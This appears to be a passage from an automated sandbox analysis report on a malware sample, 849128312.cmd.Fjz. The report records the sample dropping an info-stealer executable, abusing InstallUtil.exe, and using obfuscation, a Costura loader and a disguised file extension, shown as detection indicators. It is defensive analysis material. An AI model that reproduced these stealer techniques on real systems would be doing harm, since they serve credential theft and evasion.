Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\849128312.cmd.Fjz

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: InstallUtil.exe, 00000009.00000002.4531112270.00000000010ED000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4532284411.000000000095D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: nC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdb source: InstallUtil.exe, 0000000D.00000002.4530525636.0000000000758000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.pdbpdbtem.pdb source: InstallUtil.exe, 00000009.00000002.4531112270.00000000010ED000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4532284411.000000000095D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: InstallUtil.exe, 00000009.00000002.4570717346.0000000005C4E000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4532284411.0000000000983000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\InstallUtil.pdbpdbtil.pdb9 source: InstallUtil.exe, 00000009.00000002.4570717346.0000000005C4E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: nC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdbH source: InstallUtil.exe, 00000009.00000002.4530627422.0000000000F39000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: n.pdb source: InstallUtil.exe, 00000009.00000002.4530627422.0000000000F39000.00000004.00000010.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4530525636.0000000000758000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000006653000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000006711000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2224438229.0000000009270000.00000004.08000000.00040000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000005302000.00000004.00000800.00020000.00000000.sdmp, stealer-CR-0110.exe, 00000008.00000002.2211271521.0000000002BF7000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: ((.pdb source: InstallUtil.exe, 00000009.00000002.4530627422.0000000000F39000.00000004.00000010.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4530525636.0000000000758000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\InstallUtil.pdbH source: InstallUtil.exe, 0000000D.00000002.4532284411.0000000000983000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\InstallUtil.pdb source: InstallUtil.exe, 00000009.00000002.4531112270.00000000010ED000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4532284411.00000000009B3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: usymbols\exe\InstallUtil.pdb source: InstallUtil.exe, 0000000D.00000002.4530525636.0000000000758000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: InstallUtil.pdb\h source: InstallUtil.exe, 0000000D.00000002.4545766049.0000000004F99000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000006653000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000006711000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2224438229.0000000009270000.00000004.08000000.00040000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000005302000.00000004.00000800.00020000.00000000.sdmp, stealer-CR-0110.exe, 00000008.00000002.2211271521.0000000002BF7000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.pdb*C source: InstallUtil.exe, 0000000D.00000002.4532284411.00000000009B3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: InstallUtil.pdbllUtil.pdbpdbtil.pdb.30319\InstallUtil.pdb source: InstallUtil.exe, 00000009.00000002.4530627422.0000000000F39000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb2 source: InstallUtil.exe, 00000009.00000002.4570717346.0000000005C4E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: InstallUtil.exe, 0000000D.00000002.4532284411.00000000009B3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000005EDF000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000006653000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2217877802.0000000008820000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdb source: InstallUtil.exe, 0000000D.00000002.4532284411.00000000009B3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000005EDF000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000006653000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2217877802.0000000008820000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: InstallUtil.pdb source: InstallUtil.exe, 00000009.00000002.4530627422.0000000000F39000.00000004.00000010.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.4570717346.0000000005C44000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.4570717346.0000000005C4E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: InstallUtil.exe, 00000009.00000002.4531112270.00000000010ED000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: InstallUtil.pdbz source: InstallUtil.exe, 00000009.00000002.4530627422.0000000000F39000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\InstallUtil.pdbpdbtil.pdb source: InstallUtil.exe, 0000000D.00000002.4532284411.0000000000983000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: InstallUtil.exe, 00000009.00000002.4570717346.0000000005C40000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\InstallUtil.pdb'9 source: InstallUtil.exe, 0000000D.00000002.4532284411.0000000000983000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\exe\InstallUtil.pdb source: InstallUtil.exe, 00000009.00000002.4531112270.00000000010ED000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4532284411.000000000095D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\InstallUtil.pdbn source: InstallUtil.exe, 00000009.00000002.4570717346.0000000005C4E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: InstallUtil.pdb.NETFrameworkv4.0.30319InstallUtil.exe source: InstallUtil.exe, 00000009.00000002.4570717346.0000000005C4E000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4532284411.00000000009E4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\exe\InstallUtil.pdbc source: InstallUtil.exe, 0000000D.00000002.4532284411.000000000095D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbKj source: InstallUtil.exe, 0000000D.00000002.4545766049.0000000004F99000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.PDBl source: InstallUtil.exe, 0000000D.00000002.4532284411.00000000009B3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: InstallUtil.exe, 00000009.00000002.4531112270.00000000010ED000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: n8C:\Windows\InstallUtil.pdb source: InstallUtil.exe, 00000009.00000002.4530627422.0000000000F39000.00000004.00000010.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4530525636.0000000000758000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: InstallUtil.pdb\rvr hr_CorExeMainmscoree.dll source: InstallUtil.exe, 00000009.00000002.4570717346.0000000005C44000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: InstallUtil.exe, 00000009.00000002.4570717346.0000000005C4E000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4532284411.00000000009B3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdbBC source: InstallUtil.exe, 0000000D.00000002.4532284411.00000000009B3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: powershell.pdbUGP source: 849128312.cmd.Fjz, 00000007.00000000.2063200519.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, 849128312.cmd.Fjz.4.dr
Source:	Binary string: InstallUtil.pdbllUtil.pdbpdbtil.pdb.30319\InstallUtil.pdb8W source: InstallUtil.exe, 0000000D.00000002.4530525636.0000000000758000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: powershell.pdb source: 849128312.cmd.Fjz, 00000007.00000000.2063200519.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, 849128312.cmd.Fjz.4.dr
Source:	Binary string: \??\C:\Windows\mscorlib.pdb? source: InstallUtil.exe, 00000009.00000002.4570717346.0000000005C4E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: symbols\exe\InstallUtil.pdb source: InstallUtil.exe, 00000009.00000002.4530627422.0000000000F39000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\InstallUtil.pdb source: InstallUtil.exe, 00000009.00000002.4570717346.0000000005C4E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\InstallUtil.pdb source: InstallUtil.exe, 0000000D.00000002.4532284411.00000000009B3000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: 7.2.849128312.cmd.Fjz.67118f8.11.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 7.2.849128312.cmd.Fjz.67118f8.11.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 7.2.849128312.cmd.Fjz.67118f8.11.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 7.2.849128312.cmd.Fjz.6653a98.8.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 7.2.849128312.cmd.Fjz.6653a98.8.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 7.2.849128312.cmd.Fjz.6653a98.8.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 7.2.849128312.cmd.Fjz.6653a98.8.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 7.2.849128312.cmd.Fjz.6653a98.8.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull
Source: 7.2.849128312.cmd.Fjz.9270000.21.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 7.2.849128312.cmd.Fjz.9270000.21.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 7.2.849128312.cmd.Fjz.9270000.21.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 7.2.849128312.cmd.Fjz.4e17544.5.raw.unpack, GetterBroadcasterConsumer.cs	.Net Code: TestToken System.AppDomain.Load(byte[])

Yara detected Costura Assembly Loader

Source: Yara match	File source: 7.2.849128312.cmd.Fjz.6589638.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.849128312.cmd.Fjz.87c0000.19.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.stealer-CR-0110.exe.7130000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.849128312.cmd.Fjz.63e2288.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2241217734.0000000007130000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2217536851.00000000087C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2173518865.0000000004EEA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2211271521.00000000028E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2192046341.0000000005EDF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 849128312.cmd.Fjz PID: 6640, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: stealer-CR-0110.exe PID: 6396, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 4284, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 6020, type: MEMORYSTR

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_06D8B6EA push es; ret	7_2_06D8B718
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_06D894E9 push es; ret	7_2_06D894EC
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_06D83BDB push es; ret	7_2_06D83BDC
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_06DBE738 push es; ret	7_2_06DBE7F0
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_06DB850F push es; retf	7_2_06DB851C
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_06DB6086 push ecx; ret	7_2_06DB6089
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_06DB89E3 push es; retf	7_2_06DB89F4
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_06DF440D push FFFFFF8Bh; iretd	7_2_06DF440F
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_06DF4535 push FFFFFF8Bh; iretd	7_2_06DF4537
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_06DF43F3 push FFFFFF8Bh; ret	7_2_06DF43F8
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_06DF43B9 push FFFFFF8Bh; ret	7_2_06DF43BE
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_074504A9 push eax; iretd	7_2_074504C1
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_08E3F50C pushfd ; ret	7_2_08E3F50D
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_08E5B2FF push ebx; retf	7_2_08E5B300
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_08E5472D push eax; iretd	7_2_08E5472E
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_02648DF5 push B8FFFF9Fh; iretd	8_2_02648DFA
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_0495C3C0 push ebp; ret	8_2_0495C3C1
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_05D644D8 pushfd ; retf	8_2_05D644D9
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_05D68250 pushad ; iretd	8_2_05D68251
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_05DA54E0 push FFFFFF80h; ret	8_2_05DA54E4
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_07097C29 push edx; ret	8_2_07097C2A
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_07097033 push edx; iretd	8_2_07097036
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 13_2_025D0743 pushad ; retf	13_2_025D07A5

Source: 7.2.849128312.cmd.Fjz.86e0000.18.raw.unpack, s1o4cko7nwCvsxsaJYt.cs

Drops PE files

Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\Desktop\849128312.cmd.Fjz			Jump to dropped file
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	File created: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe			Jump to dropped file

Drops files with a non-matching file extension (content does not match file extension)

Source: C:\Windows\System32\xcopy.exe

File created: C:\Users\user\Desktop\849128312.cmd.Fjz

Jump to dropped file

Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
